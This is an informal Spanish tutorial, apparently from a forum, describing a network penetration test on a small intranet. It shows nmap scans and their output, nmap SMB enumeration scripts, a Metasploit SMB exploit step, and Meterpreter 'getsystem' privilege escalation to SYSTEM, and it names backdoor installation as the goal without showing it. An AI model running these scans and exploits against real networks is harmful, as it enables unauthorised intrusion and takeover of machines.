Tema: Esenario pentesting Red

Inp3nt3zt3r

concat : [email protected]

esto es un esenario a la hora de un ataque en una red donde tenemos que tener en cuenta algunos puntos

1) como se compone la red
2) cuantos equipos hay en red
3) servicios de estos equipos
4) bug en los nodos
5) ejecutar exploits
5) subir privilegios
6) instalar backdoor

para mi a la hora de hacer una practica en red es tratar de cumplir como estos mini estandares los cuales la finalidad de todos estos es obtener los mayores nodos y tener la red completa

1) como se compone la red

hay que tener en cuenta como se compone la estructura de esta red ya sea una lam , wlam tipologias que estan manejen estan practicas se realizaran sobre una simple intranet

2) para esto pódemos utilizar similitudes de software para averiguar cuantos equipos hay en red la mejor es nmap primero avisto mi ip esto sera plataforma windows ya que no trage mi lapto

iniciamos mirando cual es mi ip ya que maneja un DHCP y me asigno una ip

Código:

todo de mi ip desde rango 1 hasta 255 para ver los equipos

como podemos ver existen tres ip activas con sus respectivos servicios

Código:

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
80/tcp   open  http
5431/tcp open  park-agent
MAC Address: 14:D6:4D:8B:20:42 (Unknown)

Nmap scan report for 192.168.0.4
Host is up (0.0026s latency).
Not shown: 995 filtered ports
PORT     STATE  SERVICE
135/tcp  open   msrpc
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
1025/tcp open   NFS-or-IIS
2869/tcp closed unknown
MAC Address: 00:16:17:A6:A6:F9 (MSI)

Nmap scan report for 192.168.0.5
Host is up (0.0024s latency).
Not shown: 996 filtered ports
PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
2126/tcp closed unknown
2869/tcp closed unknown
MAC Address: 00:13:8F:8B:3D:4F (Asiarock Incorporation)

de aqui en adelante ya tengo mis objetivos

3) mirando aqui los equipos tiene lo mismo de la parte dos pero ahora veremos el tipo de servicio que se ejecuta y su version un poco os fingerprint

mirando el primer equipo es un router sigo miramos informacion mas detallada



4) ya sabiendo que protocolos utilizo miremos mas informacion ahora utilizo scripts de nmap

smb-check-vulns.nse --me dice fallos protocolos
smb-enum-groups.nse -- grupo de usuario
smb-enum-processes.nse -- procesos que utiliza
smb-enum-sessions.nse -- session activa
smb-enum-users.nse -- todos los usuarios

ok esto se mostraria de la siguiente forma

--script=smb-check-vulns.nse,smb-enum-users.nse,smb-enum-sessions.nse,smb-enum-groups.nse,smb-enum-processes.nse




como vemos tenemos informacion de tallada tipo ataque

5) proceso a irme al metasploit me dice que es vulnerable a protocolo SNB



ahora la finalidad es subir todos los privilegios que pueda obtener para instalar backdoor


5) subir privilegios

para esto haremos lo siguiente


meterpreter> use priv
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t The technique to use. (Default to ’0′).
0 : All techniques available
1 : Service – Named Pipe Impersonation (In Memory/Admin)
2 : Service – Named Pipe Impersonation (Dropper/Admin)
3 : Service – Token Duplication (In Memory/Admin)
4 : Exploit – KiTrap0D (In Memory/User)

Como se puede apreciar existen diferentes técnicas empleadas por la extensión priv para elevar los privilegios de la consola actual, se puede utilizar una de las técnicas o todas, si no se especifica ningun parámetro ningún parámetro se utilizan todas.

meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

6) la instalacion del backdoor se las debo por que en estos momentos no lo tengo a mano